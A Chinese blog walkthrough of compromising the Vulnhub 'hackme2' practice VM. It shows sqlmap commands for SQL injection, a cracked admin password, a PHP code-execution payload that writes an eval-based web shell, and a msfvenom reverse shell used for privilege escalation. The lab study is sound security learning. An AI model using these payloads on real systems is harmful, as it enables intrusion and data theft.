Hackme2靶机总结

已于 2023-01-08 21:12:58 修改
阅读量433 收藏 2
点赞数
分类专栏: 靶机测试 文章标签: 数据库 mysql sql
于 2022-12-17 22:36:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45301512/article/details/128358158
版权

Hackme2靶机渗透总结

靶机下载地址:
https://download.vulnhub.com/hackme/hackme2-DHCP.ova

  1. 先用nmap扫描出hackme2靶机的ip和端口,并且根据80端口,打开网站在这里插入图片描述
    在这里插入图片描述

  2. 根据注册页面注册了个bihuo15账号,密码也是bihuo15,并且登录进去
    在这里插入图片描述
    在这里插入图片描述

  3. 可以看到有个根据图书标题搜索的搜索框,点击了一个search之后,出现了大量数据在这里插入图片描述

  4. 经过测试,这里使用的是模糊查询,大概的构造一下语句
    Select * from book where tilte = “%title%”
    先用sqlmap跑一下
    (1) 因为是post提交参数,先将请求包放到1.txt中
    在这里插入图片描述
    (2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数
    在这里插入图片描述
    (3) 加上之后继续跑
    python sqlmap.py –r 1.txt --data=”search=1” --level 5 --tamper=space2comment --batch
    发现还是出不来,根据中间的提示,再指定一下数据库试试
    加上参数 --dbms= “MySQL”
    在这里插入图片描述
    (4) 更换语句
    python sqlmap.py –r 1.txt --data=”search=1” --dbms=”Mysql” –level 5 --tamper=space2comment --batch
    成功的跑了出来,存在时间注入和联合注入
    在这里插入图片描述
    (5) 之后就简单了,查数据库,数据表,字段值
    a) 数据库:
    在这里插入图片描述
    b) webapphacking数据库中的数据表:
    在这里插入图片描述
    c) users表中的字段:
    在这里插入图片描述
    d) user字段和pasword字段的值:在这里插入图片描述

  5. 用户名和密码已经获得了,可以看出,大概率是要superadmin用户来登录,破解一下密码
    MD5解密网站: https://www.somd5.com/
    得到密码Uncrackable
    在这里插入图片描述

  6. 进行登录,发现新的网站新的功能在这里插入图片描述

  7. 使用Xray测试一下,发现再last name 出存在代码执行漏洞在这里插入图片描述
    使用给出的payload测试,发现md5函数被执行了
    ${@var_dump(md5(194236224))};
    因此判断,可以再md5这里替换任意的php代码
    在这里插入图片描述

    测试${@var_dump(phpinfo())}; 成功解析在这里插入图片描述
    那么直接植入代码,这里存在这空格被过滤了,因此用<?=eval 代替<?php eval ${@var_dump(file_put_contents('./shell.php','<?=eval($_POST[12345]);?>'))}
    成功的生成一个包含一句话木马的shell.php,并且路径是当前的文件同级目录
    利用蚁剑连接,连接成功

    在这里插入图片描述
    在这里插入图片描述

  8. 最后按照一般的渗透测试思路,最后这步就是提权
    (1)Sudo提权无法使用
    (2)修改passwd也不行
    (3)Suid也不行
    (4)Crontab计划任务也不行
    (5)然后因为在config.php中获取了数据库的用户名和密码
    在这里插入图片描述
    尝试考虑mysql提权在这里插入图片描述但是发现登陆不进去mysql在这里插入图片描述
    (6) 上传了dama.php,但是测试,发现执行sql语句的时候,就出现bug
    其它的udf mof vbs phpmyadmin的提权存在特定的限制,也没法使用
    在这里插入图片描述在这里插入图片描述

  9. 看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权
    在这里插入图片描述在这里插入图片描述

  10. 使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下
    在java主机上去访问http://192.168.11.140/tiquan.php
    在kali中等待msf连接
    最后运行touchmenot文件后提权成功在这里插入图片描述

Beilay()
关注
专栏目录
Kioptrix2-WalkThrough 靶机复现.docx
10-18
本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,以确定靶机的 IP 地址。在这里,...
hackme2 复现
weixin_65722679的博客
06-23 63
hackme2 靶场 复现 getshell
Vulnhub--hackme2
weixin_45168704的博客
06-12 206
拿下hackme2
hackme-2靶机渗透详解
大熊
06-12 548
这个靶机的难度适中,通过这个靶机的联系,感觉更可以增强自己对这些漏洞执行的连贯性,靶机主要考察了目录扫描,sql注入(这里要绕过空格过滤),文件上传与命令执行的结合,反弹shell及提权。该靶机可以串通各部分知识,值得一做。
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 4188
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
hackerme2靶机渗透~SQL注入+命令执行
最新发布
weixin_67832625的博客
08-12 570
本文主要是SQL注入和命令执行的漏洞进行挖掘,并且对最后的提权一个靶机练习,笔者用最详细的介绍和讲解,有任何问题随时反馈给作者
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
hackme-2
qq_45747465的博客
06-12 162
打靶--hackme-2
HACKME-2 打靶
weixin_57315671的博客
06-16 102
靶机描述:靶机地址:https://www.vulnhub.com/entry/hackme-2,618/超级管理员用户superadmin的密码为Uncrackable。开启一台kali作为攻击机,将两台机子均设为NAT模式。2. 注册用户,admin,密码为123456。1.进入主页发现是登录页面,且可以注册用户。6.浏览器访问 空白页面说明上传成功。超级管理员登录,发现有文件上传点。尝试union联合注入。获取数据库名等基本信息。5.上传文件并改后缀。7.kali开启监听。
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 1223
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
(全网究极无敌详细)vlunhub靶机渗透:HACKME2
m0_70065235的博客
10-14 248
(究极无敌详细小白一看就会)hackme2靶机渗透报告
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1106
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
vulnhub----hackme2-DHCP靶机
woshicainiao666的博客
02-26 939
文件上传+命令执行漏洞结合
Vulnhub靶机hackme2-DHCP
qq_48904485的博客
02-01 955
运行环境:Virtualbox(攻击机)和VMware(靶机)攻击机:kali(192.168.56.106)靶机hackme2-DHCP(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hackme/hackme2-DHCP.ova。
靶机渗透练习14-hackme2
hirak0的博客
04-15 1043
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-2,618/ Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think ou
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6905
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值